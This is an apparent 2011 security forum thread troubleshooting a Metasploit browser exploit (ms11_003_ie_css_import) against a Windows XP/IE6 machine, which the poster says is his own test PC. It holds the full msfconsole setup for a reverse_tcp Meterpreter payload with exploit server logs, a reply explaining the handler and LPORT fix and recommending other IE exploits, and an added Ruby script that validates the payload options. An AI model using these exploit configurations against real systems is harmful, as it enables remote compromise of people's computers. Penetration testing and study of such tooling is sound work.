tony1grendel Posted September 2, 2011

Hey, guys. I really hope somebody could help me out here.

I am running Linux, Ubuntu 10.04. I have MySQL installed and the database msf3 configured. I have the Metasploit Framework installed. I have Armitage installed.

I run the msfrpc daemon (with no SSL and type Basic):

sudo msfrpcd -f -U msf -P test -a 127.0.0.1 -t Basic -S

I get the following output:

[*] XMLRPC starting on 127.0.0.1:55553 (NO SSL):Basic...
[*] XMLRPC ready at 2011-09-02 13:20:16 -0500.

I assume everything is good here. Then I run gksudo armitage, uncheck SSL and select mysql. I hit Connect, Armitage loads, I do an nmap on my IP range. I see the target computer that I'm testing. My target PC is a Dell, Pentium 4 processor, running Windows XP Pro SP3 with IE6.

Then I select the exploit ms11_003_ie_css_import. I edit the following settings to the following values:

SRVPORT: 80
URIPATH: /
*LPORT: 443

I put an asterisk by the last setting because I ran the exploit with the default port (I believe 4444), and then with 443, and then again with 23. Every time I changed the port number I terminated and restarted msfrpcd and Armitage. Each time I get the same results (after the target logs onto the IP address in IE6):

msf > use exploit/windows/browser/ms11_003_ie_css_import
msf > set SSLVersion SSL3
SSLVersion => SSL3
msf exploit(ms11_003_ie_css_import) > set LHOST 10.12.5.48
LHOST => 10.12.5.48
msf exploit(ms11_003_ie_css_import) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf exploit(ms11_003_ie_css_import) > set LPORT 443
LPORT => 443
msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms11_003_ie_css_import) > set SSL 0
SSL => 0
msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms11_003_ie_css_import) > set TARGET 0
TARGET => 0
msf exploit(ms11_003_ie_css_import) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf exploit(ms11_003_ie_css_import) > set URIPATH /
URIPATH => /
msf exploit(ms11_003_ie_css_import) > set OBFUSCATE 1
OBFUSCATE => 1
msf exploit(ms11_003_ie_css_import) > exploit -j
[*] Exploit running as background job.
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://10.12.5.48:80/
[*] Server started.
[*] 10.12.5.114:2156 Received request for "/"
[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import redirect
[*] 10.12.5.114:2156 Received request for "/C3QEIDn.html"
[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import HTML
[*] 10.12.5.114:2156 Received request for "/generic-1314988683.dll"
[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import .NET DLL
[*] 10.12.5.114:2156 Received request for "/iexplore.exe.config"
[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import CSS
[*] 10.12.5.114:2156 Received request for "/\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80"
[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import CSS

Everything runs except for the meterpreter session. I don't compromise my target; I don't get red lightning bolts surrounding the image of the target IP. It seems like I'm doing everything that should be done. What am I doing wrong? I changed the port numbers because I believe it may be that the network is blocking certain ports, but 443 and 23 should work.
hexophrenic Posted September 2, 2011

Do you have .NET 2.0 installed on the client?
Infiltrator Posted September 3, 2011

What happens if you type the IP address of your attacker's machine into your victim's web browser?
tony1grendel Posted September 3, 2011 (Author)

Sorry, I should have been more specific. The last lines appear when the attacker's IP is entered into the victim's browser. Everything after this:

[*] Server started.
[*] 10.12.5.114:2156 Received request for "/"
[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import redirect
[*] 10.12.5.114:2156 Received request for "/C3QEIDn.html"
[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import HTML
[*] 10.12.5.114:2156 Received request for "/generic-1314988683.dll"
[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import .NET DLL
[*] 10.12.5.114:2156 Received request for "/iexplore.exe.config"
[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import CSS
[*] 10.12.5.114:2156 Received request for "/\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80"
[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import CSS

All of that is what happens.
rsmudge Posted September 3, 2011

If you're launching this exploit through Armitage's module launcher, then beware that Armitage will try to configure the payload for you. By default, LPORT is set to some random value. You'll also notice that DisablePayloadHandler is set to true by default as well. Together, these values instruct Metasploit not to start a new payload handler when launching the attack and to instruct meterpreter to connect back to that random port number (which, by the way, isn't so random: Armitage has a meterpreter listener running there already).

If you don't change LPORT and everything else is OK with the targeted environment, it'll work. If you want to change LPORT, go ahead. Just be sure to set DisablePayloadHandler to false.

Optionally, double-click the Payload option name (it'll have a thick cross next to it). This will open up a dialog to let you choose what kind of payload you want and whether a listener exists or should be started. This will update all of the payload-related options at once and you can tweak from there. This is explained in the documentation too: http://www.fastandeasyhacking.com/manual

Now on to the exploit. Be aware of a few things about this one:

(1) ms11_003_ie_css_import does not like to be served over SSL. In my experience you won't get code execution when this happens.
(2) ms11_003_ie_css_import requires that .NET 2.0 is installed on the target machine (necessary for the exploit).
(3) The exploit does not trigger twice. If you use it, you have to reboot before you try it again.

Since you're going after IE6, this exploit is not what I would use. I recommend trying ie_createobject or the ms10_002_aurora exploit.

Good luck.
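The rule rsmudge describes (DisablePayloadHandler=true means Metasploit starts no handler of its own, so LPORT must point at a listener that already exists) is easy to get wrong by hand, as the first post shows. The following is an added example written for this page, not code from the thread, from Armitage or from the Metasploit Framework: a small pre-launch check that takes the options as typed into msfconsole plus a table of handlers already listening, and reports which "set" commands would make the configuration consistent. The listener table is constructed here; in practice it would be filled from "jobs -v" in msfconsole or from netstat on the attacker box. The port 55555 used for Armitage's pre-started listener is an assumption, not a value from the thread.

```ruby
# Added example (not from the thread, Armitage or Metasploit): sanity-check the
# payload-related options of a reverse_tcp browser exploit before launching it.
#
# Rule being encoded:
#   DisablePayloadHandler=true  -> Metasploit starts no handler; LPORT must be a
#                                  port where a handler is already listening.
#   DisablePayloadHandler=false -> Metasploit starts a handler on LHOST:LPORT;
#                                  that port must therefore still be free.
#   SSL=true                    -> not recommended for ms11_003_ie_css_import.
require 'set'

# Metasploit accepts true/false, 1/0, yes/no for boolean options.
def truthy?(value)
  %w[true 1 yes].include?(value.to_s.strip.downcase)
end

# opts:      Hash of option name => value as typed into msfconsole.
# listeners: Set of [bind_host, port] pairs for handlers already running.
# Returns { ok:, problems:, fixes: } where fixes is a Hash of option => value.
def check_payload_options(opts, listeners)
  problems = []
  fixes = {}
  lhost = opts['LHOST']
  lport = opts['LPORT'].to_i
  disable_handler = truthy?(opts['DisablePayloadHandler'])

  # A handler bound to 0.0.0.0 also serves LHOST.
  handler_exists = listeners.any? { |host, port| port == lport && (host == lhost || host == '0.0.0.0') }

  if disable_handler && !handler_exists
    problems << "DisablePayloadHandler=true but nothing listens on #{lhost}:#{lport}; " \
                'the stager would connect to a closed port and no session would appear'
    fixes['DisablePayloadHandler'] = 'false'
  elsif !disable_handler && handler_exists
    problems << "a handler already listens on port #{lport}; a second one cannot bind there"
    fixes['DisablePayloadHandler'] = 'true'
  end

  if truthy?(opts['SSL'])
    problems << 'SSL is enabled; serve this exploit over plain HTTP'
    fixes['SSL'] = 'false'
  end

  { ok: problems.empty?, problems: problems, fixes: fixes }
end

# Turn the suggested fixes into lines that can be pasted into msfconsole.
def fix_commands(fixes)
  fixes.map { |name, value| "set #{name} #{value}" }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed reproduction of the thread's situation: LPORT was changed to
  # 443 while DisablePayloadHandler stayed true, and Armitage's own listener is
  # still waiting on its original port (55555 is an assumed placeholder).
  listeners = Set[['0.0.0.0', 55555]]
  opts = { 'LHOST' => '10.12.5.48', 'LPORT' => '443', 'SRVPORT' => '80',
           'DisablePayloadHandler' => 'true', 'SSL' => '0' }
  result = check_payload_options(opts, listeners)
  puts result[:problems]
  puts fix_commands(result[:fixes])
end
```

With the thread's settings the check flags the mismatch and proposes "set DisablePayloadHandler false", which is exactly the fix rsmudge gives; leaving LPORT at the port Armitage's listener already occupies passes the check unchanged.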
tony1grendel Posted September 4, 2011 (Author)

THANK YOU SO SO MUCH rsmudge! Hats off to you!